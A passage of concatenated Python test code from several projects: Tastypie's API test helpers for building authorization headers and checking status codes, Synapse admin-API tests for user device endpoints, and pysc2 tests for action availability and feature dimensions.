kwargs['content_type'] = content_type
# GET & DELETE are the only times we don't serialize the data.
if data is not None:
kwargs['data'] = data
if authentication is not None:
kwargs['HTTP_AUTHORIZATION'] = authentication
return self.client.delete(uri, **kwargs)
class ResourceTestCase(TestCase):
"""
A useful base class for the start of testing Tastypie APIs.
"""
def setUp(self):
super(ResourceTestCase, self).setUp()
self.serializer = Serializer()
self.api_client = TestApiClient()
def get_credentials(self):
"""
A convenience method for the user as a way to shorten up the
often repetitious calls to create the same authentication.
Raises ``NotImplementedError`` by default.
Usage::
class MyResourceTestCase(ResourceTestCase):
def get_credentials(self):
return self.create_basic('daniel', 'pass')
# Then the usual tests...
"""
raise NotImplementedError("You must return the class for your Resource to test.")
def create_basic(self, username, password):
"""
Creates & returns the HTTP ``Authorization`` header for use with BASIC
Auth.
"""
import base64
return 'Basic %s' % base64.b64encode(':'.join([username, password]).encode('utf-8')).decode('utf-8')
def create_apikey(self, username, api_key):
"""
Creates & returns the HTTP ``Authorization`` header for use with
``ApiKeyAuthentication``.
"""
return 'ApiKey %s:%s' % (username, api_key)
def create_digest(self, username, api_key, method, uri):
"""
Creates & returns the HTTP ``Authorization`` header for use with Digest
Auth.
"""
from tastypie.authentication import hmac, sha1, uuid, python_digest
new_uuid = uuid.uuid4()
opaque = hmac.new(str(new_uuid).encode('utf-8'), digestmod=sha1).hexdigest().decode('utf-8')
return python_digest.build_authorization_request(
username,
method.upper(),
uri,
1, # nonce_count
digest_challenge=python_digest.build_digest_challenge(time.time(), getattr(settings, 'SECRET_KEY', ''), 'django-tastypie', opaque, False),
password=api_key
)
def create_oauth(self, user):
"""
Creates & returns the HTTP ``Authorization`` header for use with Oauth.
"""
from oauth_provider.models import Consumer, Token, Resource
# Necessary setup for ``oauth_provider``.
resource, _ = Resource.objects.get_or_create(url='test', defaults={
'name': 'Test Resource'
})
consumer, _ = Consumer.objects.get_or_create(key='123', defaults={
'name': 'Test',
'description': 'Testing...'
})
token, _ = Token.objects.get_or_create(key='foo', token_type=Token.ACCESS, defaults={
'consumer': consumer,
'resource': resource,
'secret': '',
'user': user,
})
# Then generate the header.
oauth_data = {
'oauth_consumer_key': '123',
'oauth_nonce': 'abc',
'oauth_signature': '&',
'oauth_signature_method': 'PLAINTEXT',
'oauth_timestamp': str(int(time.time())),
'oauth_token': 'foo',
}
return 'OAuth %s' % ','.join([key+'='+value for key, value in oauth_data.items()])
def assertHttpOK(self, resp):
"""
Ensures the response is returning a HTTP 200.
"""
return self.assertEqual(resp.status_code, 200)
def assertHttpCreated(self, resp):
"""
Ensures the response is returning a HTTP 201.
"""
return self.assertEqual(resp.status_code, 201)
def assertHttpAccepted(self, resp):
"""
Ensures the response is returning either a HTTP 202 or a HTTP 204.
"""
self.assertIn(resp.status_code, [202, 204])
self.assertNotIn('Content-Type', resp)
def assertHttpMultipleChoices(self, resp):
"""
Ensures the response is returning a HTTP 300.
"""
return self.assertEqual(resp.status_code, 300)
def assertHttpSeeOther(self, resp):
"""
Ensures the response is returning a HTTP 303.
"""
return self.assertEqual(resp.status_code, 303)
def assertHttpNotModified(self, resp):
"""
Ensures the response is returning a HTTP 304.
"""
return self.assertEqual(resp.status_code, 304)
def assertHttpBadRequest(self, resp):
"""
Ensures the response is returning a HTTP 400.
"""
return self.assertEqual(resp.status_code, 400)
def assertHttpUnauthorized(self, resp):
"""
Ensures the response is returning a HTTP 401.
"""
return self.assertEqual(resp.status_code, 401)
def assertHttpForbidden(self, resp):
"""
Ensures the response is returning a HTTP 403.
"""
return self.assertEqual(resp.status_code, 403)
def assertHttpNotFound(self, resp):
"""
Ensures the response is returning a HTTP 404.
"""
return self.assertEqual(resp.status_code, 404)
def assertHttpMethodNotAllowed(self, resp):
"""
Ensures the response is returning a HTTP 405.
"""
return self.assertEqual(resp.status_code, 405)
def assertHttpConflict(self, resp):
"""
Ensures the response is returning a HTTP 409.
"""
return self.assertEqual(resp.status_code, 409)
def assertHttpGone(self, resp):
"""
Ensures the response is returning a HTTP 410.
"""
return self.assertEqual(resp.status_code, 410)
def assertHttpUnprocessableEntity(self, resp):
"""
Ensures the response is returning a HTTP 422.
"""
return self.assertEqual(resp.status_code, 422)
def assertHttpTooManyRequests(self, resp):
"""
Ensures the response is returning a HTTP 429.
"""
return self.assertEqual(resp.status_code, 429)
def assertHttpApplicationError(self, resp):
"""
Ensures the response is returning a HTTP 500.
"""
return self.assertEqual(resp.status_code, 500)
def assertHttpNotImplemented(self, resp):
"""
Ensures the response is returning a HTTP 501.
"""
return self.assertEqual(resp.status_code, 501)
def assertValidJSON(self, data):
"""
Given the provided ``data`` as a string, ensures that it is valid JSON &
can be loaded properly.
"""
# Just try the load. If it throws an exception, the test case will fail.
self.serializer.from_json(data)
def assertValidXML(self, data):
"""
Given the provided ``data`` as a string, ensures that it is valid XML &
can be loaded properly.
"""
# Just try the load. If it throws an exception, the test case will fail.
self.serializer.from_xml(data)
def assertValidYAML(self, data):
"""
Given the provided ``data`` as a string, ensures that it is valid YAML &
can be loaded properly.
"""
# Just try the load. If it throws an exception, the test case will fail.
self.serializer.from_yaml(data)
def assertValidPlist(self, data):
"""
Given the provided ``data`` as a string, ensures that it is valid
binary plist & can be loaded properly.
"""
# Just try the load. If it throws an exception, the test case will fail.
self.serializer.from_plist(data)
def assertValidJSONResponse(self, resp):
"""
Given a ``HttpResponse`` coming back from using the ``client``, assert that
you get back:
* An HTTP 200
* The correct content-type (``application/json``)
* The content is valid JSON
"""
self.assertHttpOK(resp)
self.assertTrue(resp['Content-Type'].startswith('application/json'))
self.assertValidJSON(force_text(resp.content))
def assertValidXMLResponse(self, resp):
"""
Given a ``HttpResponse`` coming back from using the ``client``, assert that
you get back:
* An HTTP 200
* The correct content-type (``application/xml``)
* The content is valid XML
"""
self.assertHttpOK(resp)
self.assertTrue(resp['Content-Type'].startswith('application/xml'))
self.assertValidXML(force_text(resp.content))
def assertValidYAMLResponse(self, resp):
"""
Given a ``HttpResponse`` coming back from using the ``client``, assert that
you get back:
* An HTTP 200
* The correct content-type (``text/yaml``)
* The content is valid YAML
"""
self.assertHttpOK(resp)
self.assertTrue(resp['Content-Type'].startswith('text/yaml'))
self.assertValidYAML(force_text(resp.content))
def assertValidPlistResponse(self, resp):
"""
Given a ``HttpResponse`` coming back from using the ``client``, assert that
you get back:
* An HTTP 200
* The correct content-type (``application/x-plist``)
* The content is valid binary plist data
"""
self.assertHttpOK(resp)
self.assertTrue(resp['Content-Type'].startswith('application/x-plist'))
self.assertValidPlist(force_text(resp.content))
def deserialize(self, resp):
"""
Given a ``HttpResponse`` coming back from using the ``client``, this method
checks the ``Content-Type`` header & attempts to deserialize the data based on
that.
It returns a Python datastructure (typically a ``dict``) of the serialized data.
"""
return self.serializer.deserialize(resp.content, format=resp['Content-Type'])
def serialize(self, data, format='application/json'):
"""
Given a Python datastructure (typically a ``dict``) & a desired content-type,
this method will return a serialized string of that data.
"""
return self.serializer.serialize(data, format=format)
def assertKeys(self, data, expected):
"""
This method ensures that the keys of the ``data`` match up to the keys of
``expected``.
It covers the (extremely) common case where you want to make sure the keys of
a response match up to what is expected. This is typically less fragile than
testing the full structure, which can be prone to data changes.
"""
self.assertEqual(sorted(data.keys()), sorted(expected))
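# Usage sketch (not part of tastypie itself): a minimal test case wiring the
# helpers above together, assuming an `/api/v1/entry/` endpoint exists.
#
#   class EntryResourceTest(ResourceTestCase):
#       def get_credentials(self):
#           return self.create_basic('daniel', 'pass')
#
#       def test_get_list(self):
#           resp = self.api_client.get('/api/v1/entry/',
#                                      authentication=self.get_credentials())
#           self.assertValidJSONResponse(resp)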
|
__all__ = ['MqttCommManager']
from .mqtt_comm_manager import MqttCommManager
|
# Copyright 2020 Dirk Klimpel
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib.parse
from http import HTTPStatus
from parameterized import parameterized
from twisted.test.proto_helpers import MemoryReactor
import synapse.rest.admin
from synapse.api.errors import Codes
from synapse.rest.client import login
from synapse.server import HomeServer
from synapse.util import Clock
from tests import unittest
class DeviceRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
]
def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer) -> None:
self.handler = hs.get_device_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.other_user_token = self.login("user", "pass")
res = self.get_success(self.handler.get_devices_by_user(self.other_user))
self.other_user_device_id = res[0]["device_id"]
self.url = "/_synapse/admin/v2/users/%s/devices/%s" % (
urllib.parse.quote(self.other_user),
self.other_user_device_id,
)
@parameterized.expand(["GET", "PUT", "DELETE"])
def test_no_auth(self, method: str) -> None:
"""
        Try to get a device of a user without authentication.
"""
channel = self.make_request(method, self.url, b"{}")
self.assertEqual(
HTTPStatus.UNAUTHORIZED,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
@parameterized.expand(["GET", "PUT", "DELETE"])
def test_requester_is_no_admin(self, method: str) -> None:
"""
If the user is not a server admin, an error is returned.
"""
channel = self.make_request(
method,
self.url,
access_token=self.other_user_token,
)
self.assertEqual(
HTTPStatus.FORBIDDEN,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
@parameterized.expand(["GET", "PUT", "DELETE"])
def test_user_does_not_exist(self, method: str) -> None:
"""
Tests that a lookup for a user that does not exist returns a HTTPStatus.NOT_FOUND
"""
url = (
"/_synapse/admin/v2/users/@unknown_person:test/devices/%s"
% self.other_user_device_id
)
channel = self.make_request(
method,
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.NOT_FOUND, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
@parameterized.expand(["GET", "PUT", "DELETE"])
def test_user_is_not_local(self, method: str) -> None:
"""
        Tests that a lookup for a user that is not local returns an HTTPStatus.BAD_REQUEST
"""
url = (
"/_synapse/admin/v2/users/@unknown_person:unknown_domain/devices/%s"
% self.other_user_device_id
)
channel = self.make_request(
method,
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.BAD_REQUEST, channel.code, msg=channel.json_body)
self.assertEqual("Can only lookup local users", channel.json_body["error"])
def test_unknown_device(self) -> None:
"""
Tests that a lookup for a device that does not exist returns either HTTPStatus.NOT_FOUND or HTTPStatus.OK.
"""
url = "/_synapse/admin/v2/users/%s/devices/unknown_device" % urllib.parse.quote(
self.other_user
)
channel = self.make_request(
"GET",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.NOT_FOUND, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
channel = self.make_request(
"PUT",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
channel = self.make_request(
"DELETE",
url,
access_token=self.admin_user_tok,
)
# Delete unknown device returns status HTTPStatus.OK
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
def test_update_device_too_long_display_name(self) -> None:
"""
Update a device with a display name that is invalid (too long).
"""
        # Set initial display name.
update = {"display_name": "new display"}
self.get_success(
self.handler.update_device(
self.other_user, self.other_user_device_id, update
)
)
# Request to update a device display name with a new value that is longer than allowed.
update = {
"display_name": "a"
* (synapse.handlers.device.MAX_DEVICE_DISPLAY_NAME_LEN + 1)
}
channel = self.make_request(
"PUT",
self.url,
access_token=self.admin_user_tok,
content=update,
)
self.assertEqual(HTTPStatus.BAD_REQUEST, channel.code, msg=channel.json_body)
self.assertEqual(Codes.TOO_LARGE, channel.json_body["errcode"])
# Ensure the display name was not updated.
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual("new display", channel.json_body["display_name"])
def test_update_no_display_name(self) -> None:
"""
        Tests that an update for a device without a JSON body returns an HTTPStatus.OK
"""
        # Set initial display name.
update = {"display_name": "new display"}
self.get_success(
self.handler.update_device(
self.other_user, self.other_user_device_id, update
)
)
channel = self.make_request(
"PUT",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
# Ensure the display name was not updated.
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual("new display", channel.json_body["display_name"])
def test_update_display_name(self) -> None:
"""
Tests a normal successful update of display name
"""
# Set new display_name
channel = self.make_request(
"PUT",
self.url,
access_token=self.admin_user_tok,
content={"display_name": "new displayname"},
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
# Check new display_name
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual("new displayname", channel.json_body["display_name"])
def test_get_device(self) -> None:
"""
        Tests that a normal lookup for a device is successful
"""
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual(self.other_user, channel.json_body["user_id"])
# Check that all fields are available
self.assertIn("user_id", channel.json_body)
self.assertIn("device_id", channel.json_body)
self.assertIn("display_name", channel.json_body)
self.assertIn("last_seen_ip", channel.json_body)
self.assertIn("last_seen_ts", channel.json_body)
def test_delete_device(self) -> None:
"""
        Tests that removing a device is successful
"""
        # Count the number of devices of the user.
res = self.get_success(self.handler.get_devices_by_user(self.other_user))
number_devices = len(res)
self.assertEqual(1, number_devices)
# Delete device
channel = self.make_request(
"DELETE",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
# Ensure that the number of devices is decreased
res = self.get_success(self.handler.get_devices_by_user(self.other_user))
self.assertEqual(number_devices - 1, len(res))
class DevicesRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
]
def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer) -> None:
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.url = "/_synapse/admin/v2/users/%s/devices" % urllib.parse.quote(
self.other_user
)
def test_no_auth(self) -> None:
"""
        Try to list devices of a user without authentication.
"""
channel = self.make_request("GET", self.url, b"{}")
self.assertEqual(
HTTPStatus.UNAUTHORIZED,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
def test_requester_is_no_admin(self) -> None:
"""
If the user is not a server admin, an error is returned.
"""
other_user_token = self.login("user", "pass")
channel = self.make_request(
"GET",
self.url,
access_token=other_user_token,
)
self.assertEqual(
HTTPStatus.FORBIDDEN,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
def test_user_does_not_exist(self) -> None:
"""
        Tests that a lookup for a user that does not exist returns HTTPStatus.NOT_FOUND
"""
url = "/_synapse/admin/v2/users/@unknown_person:test/devices"
channel = self.make_request(
"GET",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.NOT_FOUND, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
def test_user_is_not_local(self) -> None:
"""
        Tests that a lookup for a user that is not local returns HTTPStatus.BAD_REQUEST
"""
url = "/_synapse/admin/v2/users/@unknown_person:unknown_domain/devices"
channel = self.make_request(
"GET",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.BAD_REQUEST, channel.code, msg=channel.json_body)
self.assertEqual("Can only lookup local users", channel.json_body["error"])
def test_user_has_no_devices(self) -> None:
"""
        Tests that a normal lookup for devices is successful
        if the user has no devices
"""
# Get devices
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual(0, channel.json_body["total"])
self.assertEqual(0, len(channel.json_body["devices"]))
def test_get_devices(self) -> None:
"""
        Tests that a normal lookup for devices is successful
"""
# Create devices
number_devices = 5
for _ in range(number_devices):
self.login("user", "pass")
# Get devices
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual(number_devices, channel.json_body["total"])
self.assertEqual(number_devices, len(channel.json_body["devices"]))
self.assertEqual(self.other_user, channel.json_body["devices"][0]["user_id"])
# Check that all fields are available
for d in channel.json_body["devices"]:
self.assertIn("user_id", d)
self.assertIn("device_id", d)
self.assertIn("display_name", d)
self.assertIn("last_seen_ip", d)
self.assertIn("last_seen_ts", d)
class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
]
def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer) -> None:
self.handler = hs.get_device_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.url = "/_synapse/admin/v2/users/%s/delete_devices" % urllib.parse.quote(
self.other_user
)
def test_no_auth(self) -> None:
"""
        Try to delete devices of a user without authentication.
"""
channel = self.make_request("POST", self.url, b"{}")
self.assertEqual(
HTTPStatus.UNAUTHORIZED,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
def test_requester_is_no_admin(self) -> None:
"""
If the user is not a server admin, an error is returned.
"""
other_user_token = self.login("user", "pass")
channel = self.make_request(
"POST",
self.url,
access_token=other_user_token,
)
self.assertEqual(
HTTPStatus.FORBIDDEN,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
def test_user_does_not_exist(self) -> None:
"""
        Tests that a lookup for a user that does not exist returns HTTPStatus.NOT_FOUND
"""
url = "/_synapse/admin/v2/users/@unknown_person:test/delete_devices"
channel = self.make_request(
"POST",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.NOT_FOUND, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
def test_user_is_not_local(self) -> None:
"""
        Tests that a lookup for a user that is not local returns HTTPStatus.BAD_REQUEST
"""
url = "/_synapse/admin/v2/users/@unknown_person:unknown_domain/delete_devices"
channel = self.make_request(
"POST",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.BAD_REQUEST, channel.code, msg=channel.json_body)
self.assertEqual("Can only lookup local users", channel.json_body["error"])
def test_unknown_devices(self) -> None:
"""
        Tests that removing devices that do not exist returns HTTPStatus.OK.
"""
channel = self.make_request(
"POST",
self.url,
access_token=self.admin_user_tok,
content={"devices": ["unknown_device1", "unknown_device2"]},
)
        # Deleting unknown devices returns HTTPStatus.OK
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
def test_delete_devices(self) -> None:
"""
        Tests that removing devices is successful
"""
# Create devices
number_devices = 5
for _ in range(number_devices):
self.login("user", "pass")
# Get devices
res = self.get_success(self.handler.get_devices_by_user(self.other_user))
self.assertEqual(number_devices, len(res))
# Create list of device IDs
device_ids = []
for d in res:
device_ids.append(str(d["device_id"]))
# Delete devices
channel = self.make_request(
"POST",
self.url,
access_token=self.admin_user_tok,
content={"devices": device_ids},
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
res = self.get_success(self.handler.get_devices_by_user(self.other_user))
self.assertEqual(0, len(res))
|
#!/usr/bin/python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for features."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import pickle
from absl.testing import absltest
from absl.testing import parameterized
from future.builtins import range # pylint: disable=redefined-builtin
import numpy
import six
from pysc2.lib import actions
from pysc2.lib import features
from pysc2.lib import point
from google.protobuf import text_format
from s2clientprotocol import sc2api_pb2 as sc_pb
# Heavily trimmed, so this is useful for testing actions, but not observations.
observation_text_proto = """
player_common {
player_id: 1
minerals: 0
vespene: 0
food_cap: 10
food_used: 0
food_army: 0
food_workers: 0
idle_worker_count: 0
army_count: 0
warp_gate_count: 0
larva_count: 0
}
game_loop: 20
"""
RECTANGULAR_DIMENSIONS = features.Dimensions(screen=(84, 80), minimap=(64, 67))
SQUARE_DIMENSIONS = features.Dimensions(screen=84, minimap=64)
class AvailableActionsTest(absltest.TestCase):
always_expected = {
"no_op", "move_camera", "select_point", "select_rect",
"select_control_group"
}
def setUp(self):
super(AvailableActionsTest, self).setUp()
self.obs = text_format.Parse(observation_text_proto, sc_pb.Observation())
self.hideSpecificActions(True)
def hideSpecificActions(self, hide_specific_actions): # pylint: disable=invalid-name
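    # Rebuild self.features with the given hide_specific_actions setting so tests can toggle it.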
self.features = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
hide_specific_actions=hide_specific_actions))
def assertAvail(self, expected):
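    # The set of available action names must equal `expected` plus the always-available actions.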
actual = self.features.available_actions(self.obs)
actual_names = {actions.FUNCTIONS[i].name for i in actual}
self.assertEqual(actual_names, set(expected) | self.always_expected)
def testAlways(self):
self.assertAvail([])
def testSelectUnit(self):
self.obs.ui_data.multi.units.add(unit_type=1)
self.assertAvail(["select_unit"])
  def testSelectIdleWorker(self):
self.obs.player_common.idle_worker_count = 1
self.assertAvail(["select_idle_worker"])
def testSelectArmy(self):
self.obs.player_common.army_count = 3
self.assertAvail(["select_army"])
def testSelectWarpGates(self):
self.obs.player_common.warp_gate_count = 1
self.assertAvail(["select_warp_gates"])
def testSelectLarva(self):
self.obs.player_common.larva_count = 2
self.assertAvail(["select_larva"])
def testQuick(self):
self.obs.abilities.add(ability_id=32)
self.assertAvail(["Effect_Salvage_quick"])
def testScreen(self):
self.obs.abilities.add(ability_id=326, requires_point=True)
self.assertAvail(["Build_SensorTower_screen"])
def testScreenMinimap(self):
self.obs.abilities.add(ability_id=17, requires_point=True)
self.assertAvail(["Patrol_screen", "Patrol_minimap"])
def testScreenAutocast(self):
self.obs.abilities.add(ability_id=386, requires_point=True)
self.assertAvail(["Effect_Heal_screen", "Effect_Heal_autocast"])
def testScreenQuick(self):
a = self.obs.abilities.add(ability_id=421)
self.hideSpecificActions(True)
a.requires_point = False
self.assertAvail(["Build_TechLab_quick"])
a.requires_point = True
self.assertAvail(["Build_TechLab_screen"])
self.hideSpecificActions(False)
a.requires_point = False
self.assertAvail(["Build_TechLab_Barracks_quick", "Build_TechLab_quick"])
a.requires_point = True
self.assertAvail(["Build_TechLab_Barracks_screen", "Build_TechLab_screen"])
def testGeneral(self):
self.obs.abilities.add(ability_id=1374)
self.hideSpecificActions(False)
self.assertAvail(["BurrowDown_quick", "BurrowDown_Baneling_quick"])
self.hideSpecificActions(True)
self.assertAvail(["BurrowDown_quick"])
def testGeneralType(self):
a = self.obs.abilities.add(ability_id=1376)
self.hideSpecificActions(False)
self.assertAvail(["BurrowUp_quick", "BurrowUp_Baneling_quick",
"BurrowUp_autocast", "BurrowUp_Baneling_autocast"])
self.hideSpecificActions(True)
self.assertAvail(["BurrowUp_quick", "BurrowUp_autocast"])
a.ability_id = 2110
self.hideSpecificActions(False)
self.assertAvail(["BurrowUp_quick", "BurrowUp_Lurker_quick"])
self.hideSpecificActions(True)
self.assertAvail(["BurrowUp_quick"])
def testMany(self):
add = [
(23, True), # Attack
(318, True), # Build_CommandCenter
(320, True), # Build_Refinery
(319, True), # Build_SupplyDepot
(316, True), # Effect_Repair_SCV
(295, True), # Harvest_Gather_SCV
(16, True), # Move
(17, True), # Patrol
(4, False), # Stop
]
for a, r in add:
self.obs.abilities.add(ability_id=a, requires_point=r)
self.hideSpecificActions(False)
self.assertAvail([
"Attack_Attack_minimap",
"Attack_Attack_screen",
"Attack_minimap",
"Attack_screen",
"Build_CommandCenter_screen",
"Build_Refinery_screen",
"Build_SupplyDepot_screen",
"Effect_Repair_screen",
"Effect_Repair_autocast",
"Effect_Repair_SCV_autocast",
"Effect_Repair_SCV_screen",
"Harvest_Gather_screen",
"Harvest_Gather_SCV_screen",
"Move_minimap",
"Move_screen",
"Move_Move_minimap",
"Move_Move_screen",
"Patrol_minimap",
"Patrol_screen",
"Patrol_Patrol_minimap",
"Patrol_Patrol_screen",
"Stop_quick",
"Stop_Stop_quick"
])
self.hideSpecificActions(True)
self.assertAvail([
"Attack_minimap",
"Attack_screen",
"Build_CommandCenter_screen",
"Build_Refinery_screen",
"Build_SupplyDepot_screen",
"Effect_Repair_screen",
"Effect_Repair_autocast",
"Harvest_Gather_screen",
"Move_minimap",
"Move_screen",
"Patrol_minimap",
"Patrol_screen",
"Stop_quick",
])
class ToPointTest(absltest.TestCase):
def testIntAsString(self):
value = features._to_point("32")
self.assertEqual(value, point.Point(32, 32))
def testIntStringTwoTuple(self):
value = features._to_point(("32", 64))
self.assertEqual(value, point.Point(32, 64))
  def testNoneInputRaises(self):
with self.assertRaises(AssertionError):
features._to_point(None)
def testNoneAsFirstElementOfTupleRaises(self):
with self.assertRaises(TypeError):
features._to_point((None, 32))
def testNoneAsSecondElementOfTupleRaises(self):
with self.assertRaises(TypeError):
features._to_point((32, None))
def testSingletonTupleRaises(self):
with self.assertRaises(ValueError):
features._to_point((32,))
def testThreeTupleRaises(self):
with self.assertRaises(ValueError):
features._to_point((32, 32, 32))
class DimensionsTest(absltest.TestCase):
def testScreenSizeWithoutMinimapRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=84)
def testScreenWidthWithoutHeightRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=(84, 0), minimap=64)
def testScreenWidthHeightWithoutMinimapRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=(84, 80))
def testMinimapWidthAndHeightWithoutScreenRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(minimap=(64, 67))
def testNoneNoneRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=None, minimap=None)
def testSingularZeroesRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=0, minimap=0)
def testTwoZeroesRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=(0, 0), minimap=(0, 0))
def testThreeTupleScreenRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=(1, 2, 3), minimap=32)
def testThreeTupleMinimapRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=64, minimap=(1, 2, 3))
def testNegativeScreenRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=-64, minimap=32)
def testNegativeMinimapRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=64, minimap=-32)
def testNegativeScreenTupleRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=(-64, -64), minimap=32)
def testNegativeMinimapTupleRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=64, minimap=(-32, -32))
def testEquality(self):
self.assertEqual(features.Dimensions(screen=64, minimap=64),
features.Dimensions(screen=64, minimap=64))
self.assertNotEqual(features.Dimensions(screen=64, minimap=64),
features.Dimensions(screen=64, minimap=32))
self.assertNotEqual(features.Dimensions(screen=64, minimap=64), None)
class TestParseAgentInterfaceFormat(parameterized.TestCase):
def test_no_arguments_raises(self):
with self.assertRaises(ValueError):
features.parse_agent_interface_format()
@parameterized.parameters((32, None), (None, 32))
def test_invalid_feature_combinations_raise(self, screen, minimap):
with self.assertRaises(ValueError):
features.parse_agent_interface_format(
feature_screen=screen,
feature_minimap=minimap)
def test_valid_feature_specification_is_parsed(self):
agent_interface_format = features.parse_agent_interface_format(
feature_screen=32,
feature_minimap=(24, 24))
self.assertEqual(
agent_interface_format.feature_dimensions.screen,
point.Point(32, 32))
self.assertEqual(
agent_interface_format.feature_dimensions.minimap,
point.Point(24, 24))
@parameterized.parameters((32, None), (None, 32), (32, 64))
def test_invalid_minimap_combinations_raise(self, screen, minimap):
with self.assertRaises(ValueError):
features.parse_agent_interface_format(
rgb_screen=screen,
rgb_minimap=minimap)
def test_valid_minimap_specification_is_parsed(self):
agent_interface_format = features.parse_agent_interface_format(
rgb_screen=32,
rgb_minimap=(24, 24))
self.assertEqual(
agent_interface_format.rgb_dimensions.screen,
point.Point(32, 32))
self.assertEqual(
agent_interface_format.rgb_dimensions.minimap,
point.Point(24, 24))
def test_invalid_action_space_raises(self):
with self.assertRaises(KeyError):
features.parse_agent_interface_format(
feature_screen=64,
feature_minimap=64,
action_space="UNKNOWN_ACTION_SPACE")
@parameterized.parameters(actions.ActionSpace.__members__.keys())
def test_valid_action_space_is_parsed(self, action_space):
agent_interface_format = features.parse_agent_interface_format(
feature_screen=32,
feature_minimap=(24, 24),
rgb_screen=64,
rgb_minimap=(48, 48),
use_raw_units=True,
action_space=action_space)
self.assertEqual(
agent_interface_format.action_space,
actions.ActionSpace[action_space])
